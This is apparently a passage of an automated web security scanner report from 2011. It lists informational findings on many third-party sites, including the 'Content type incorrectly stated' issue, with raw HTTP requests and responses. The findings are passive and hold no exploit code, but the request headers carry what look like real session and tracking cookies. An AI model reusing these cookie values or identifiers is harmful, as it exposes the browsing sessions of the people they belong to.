Vary: Accept-Encoding
Expires: Tue, 19 Jul 2011 18:36:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 18:36:27 GMT
Content-Length: 923
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">
<!-
...[SNIP]...

28.14. http://i3.onlinehelp.microsoft.com/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i3.onlinehelp.microsoft.com
Path:   /areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css

Request

GET /areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css HTTP/1.1
Host: i3.onlinehelp.microsoft.com
Proxy-Connection: keep-alive
Referer: http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cteonnt-Length: 103
Content-Length: 103
Date: Tue, 19 Jul 2011 15:16:07 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

28.15. http://majornelson.com/favicon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://majornelson.com
Path:   /favicon.png

Request

GET /favicon.png HTTP/1.1
Host: majornelson.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=231963907.777545616.1311118951.1311118951.1311118951.1; __utmb=231963907.1.10.1311118951; __utmc=231963907; __utmz=231963907.1311118951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Jul 2011 23:44:31 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 169

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.65</center>
</body>
</html>

28.16. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1092&ref2=elqNone&tzo=360&ms=309 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.rallydev.com/agile_products/editions/community/signup/?ppc=google&kw=bug_tracking&gclid=CMWl_YzNjaoCFYpd5Qodq3Z4og
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=3FED00B3830C43E6A35A88AB0C1B4136; ELQSTATUS=OK; __utmz=16459234.1306359787.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=2150246959903343989; __utma=16459234.18880641.1306359787.1306377949.1306389346.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 19 Jul 2011 14:20:41 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

28.17. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Request

GET /utils/ping.html?random=0.18964302926735044 HTTP/1.1
Host: odb.outbrain.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: obuid=34e83892-8848-4a54-a4d4-8bdbba750320; _lvs2="1tAU7QKQIVo="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1311068672000"
Last-Modified: Tue, 19 Jul 2011 09:44:32 GMT
Content-Type: text/html
Content-Length: 158
Date: Tue, 19 Jul 2011 20:44:13 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

28.18. http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216

Request

GET /ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 647
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:33 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...

28.19. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

Request

GET /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1512
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:21 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...

28.20. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228

Request

GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228?t=1311108254581&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 990
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:08 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...

28.21. http://tm-web2.rondavu.com/com/rondavu/wt/module/static/rondavu_remote.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tm-web2.rondavu.com
Path:   /com/rondavu/wt/module/static/rondavu_remote.html

Request

GET /com/rondavu/wt/module/static/rondavu_remote.html?rondavu_remote=1&xdm_e=http://www.ticketmaster.com&xdm_c=default0&xdm_p=1 HTTP/1.1
Host: tm-web2.rondavu.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600,public
Content-Type: text/html
Date: Tue, 19 Jul 2011 18:39:38 GMT
Last-Modified: Mon, 23 May 2011 22:07:42 GMT
Server: Rondavu
Content-Length: 630
Connection: keep-alive

<!DOCTYPE html>
<html><head><title>Rondavu remote</title>

<script type="text/javascript">
var rondavu_js_url = window.location.hash.substr(1);
document.write('<'+'script src="' + rondavu_js_u
...[SNIP]...

28.22. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /scripts/WebObjects.dll/ZipCode.woa/wa/route

Request

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:04:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW4
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com
content-length: 1151

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com?zip=05672">


<TITLE>www.aaa.com redirect</TITLE>
</HE
...[SNIP]...

28.23. http://www.bnymellon.com/earnings.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bnymellon.com
Path:   /earnings.html

Request

GET /earnings.html HTTP/1.1
Host: www.bnymellon.com
Proxy-Connection: keep-alive
Referer: http://www.bnymellon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:49:22 GMT
Content-type: text/html
Connection: close

<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns ="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

28.24. http://www.builtritecc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.builtritecc.com
Path:   /

Request

GET / HTTP/1.1
Host: www.builtritecc.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/locate-dealer?zip=10010

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:50:05 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 25 Oct 2010 12:45:54 GMT
ETag: "8b48071-4d-493705f758480"
Accept-Ranges: bytes
Content-Length: 77
Content-Type: text/html

<script languange=\"JavaScript\"> window.location.href='home.html'; </script>

28.25. http://www.gamestop.com/JavaScript/CertonaTable.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /JavaScript/CertonaTable.htm

Request

GET /JavaScript/CertonaTable.htm HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=

Response

HTTP/1.1 200 OK
Cache-Control: max-age=259200
Content-Type: text/html
Content-Location: http://www.gamestop.com/JavaScript/CertonaTable.htm
Last-Modified: Mon, 18 Jul 2011 18:03:14 GMT
Accept-Ranges: bytes
ETag: "cc25b6f67445cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 473
Date: Tue, 19 Jul 2011 16:02:31 GMT
Connection: close
Vary: Accept-Encoding

...<table class="endeca_grid">
<tbody>
{#foreach $T.d as post}
<tr class=' ' onclick="window.location='{$T.post.ProductUrl}'">
<td class="itemboxart">
<img alt='' src='{$T.p
...[SNIP]...

28.26. http://www.seapine.com/ttpro.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seapine.com
Path:   /ttpro.html

Request

GET /ttpro.html?utm_source=GoogleAdwords&utm_campaign=BugTrackingAdgroup&utm_medium=Search&utm_content= HTTP/1.1
Host: www.seapine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SourceKey=201107191020391579

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:48 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Tue, 19 Jul 2011 16:20:48 GMT
Vary: Accept-Encoding
Content-Length: 28599
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <Title>Issue Tracking Software| TestTrack Pro | Bug Tracking
...[SNIP]...

29. Content type incorrectly stated  previous  next
There are 52 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


29.1. http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a0.twimg.com
Path:   /profile_images/534697216/MoMA_Twitter_Icon4_normal.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/534697216/MoMA_Twitter_Icon4_normal.gif HTTP/1.1
Host: a0.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: 2R7/cqdGsVAd9FAQFI/8xuVbx3DQJPyoSpTepa4Qyq6KtMAhml6FeTVzri40fC2Z
x-amz-request-id: D98F6A057F73B07C
Last-Modified: Thu, 19 Nov 2009 22:50:19 GMT
ETag: "af2cabb308c3ca8203b70d63588b247f"
Accept-Ranges: bytes
Content-Length: 1690
Server: AmazonS3
X-Amz-Cf-Id: a415fcbc7cfa38e75c822e83635d23af15c4a9bcc56e5421754d04691bbf479cad13247eedf0cf39,58f5f4a65b5840a189a08e2ea2bc57d86b0936eec763c036e7e6977d0f6d6c16daa155c74a73a587
X-CDN: AKAM
Cache-Control: max-age=23014153
Expires: Wed, 11 Apr 2012 00:17:22 GMT
Date: Tue, 19 Jul 2011 15:28:09 GMT
Connection: close
Content-Type: image/gif
X-CDN: AKAM

.PNG
.
...IHDR...0...0......`n....    pHYs...H...H.F.k>...    vpAg...0...0....W...7IDATX..X[l.U...efw.....E......... ...
.Z@!E..<.M...y......Z|...%.`...,.Zz..-.R"mh....vwfggg.9>L]I....y................B0.
...[SNIP]...

29.2. http://a1.twimg.com/profile_images/136003673/bcom_72x72_bigger_normal.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.twimg.com
Path:   /profile_images/136003673/bcom_72x72_bigger_normal.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/136003673/bcom_72x72_bigger_normal.gif HTTP/1.1
Host: a1.twimg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:26 GMT
Expires: Fri, 19 Jul 2019 17:53:12 GMT
Last-Modified: Mon, 13 Apr 2009 15:58:10 GMT
Cache-Control: max-age=252460800
Content-Type: image/gif
ETag: "e4a3f5b621f3c7eacf511468f8e14254"
Server: AmazonS3
X-Amz-Cf-Id: 7a80506aa13a2ca25ec0e8cde76f6bf9eb8f925f20e12d0f09efb7286986fc3a95871c1f73f0306a,ee19b7dacb30f5d0a9f678c2b4d2323c8bb789aa0075f49c8736fd256e743e49a563a4050c7f6293
x-amz-id-2: 3bJ2YgQUCAPUzKmJClmwDh/NzxlmRV+ORZyRFTAVhEL04oj4L6zeQy7zSBe7S1yE
x-amz-request-id: 3A6689485C9AA3BB
X-Cache: Miss from cloudfront
Content-Length: 2896

.PNG
.
...IHDR...0...0......`n....    pHYs...H...H.F.k>...    vpAg...0...0....W..
.IDATX...ilT.....o..f.......l....Y...I@AUR..j.F.....RU.w........I.6{R.Q.    ...l..1..0.....oo.ro.5.yl.*..{w......{..g !..?
...[SNIP]...

29.3. http://admeld.lucidmedia.com/clicksense/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:22 GMT
Expires: Tue, 19 Jul 2011 20:44:22 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
Content-Type: text/plain
Content-Length: 164
Connection: close

